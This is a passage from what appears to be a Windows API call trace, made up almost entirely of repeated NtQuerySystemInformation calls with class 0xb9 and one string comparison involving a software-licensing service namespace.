(SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc590, Length=0x28, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0281.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc4b0, Length=0x20, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc570, Length=0x20, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0281.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0281.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.268] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.277] NtQuerySystemInformation (SystemInformationClass=0xb9, 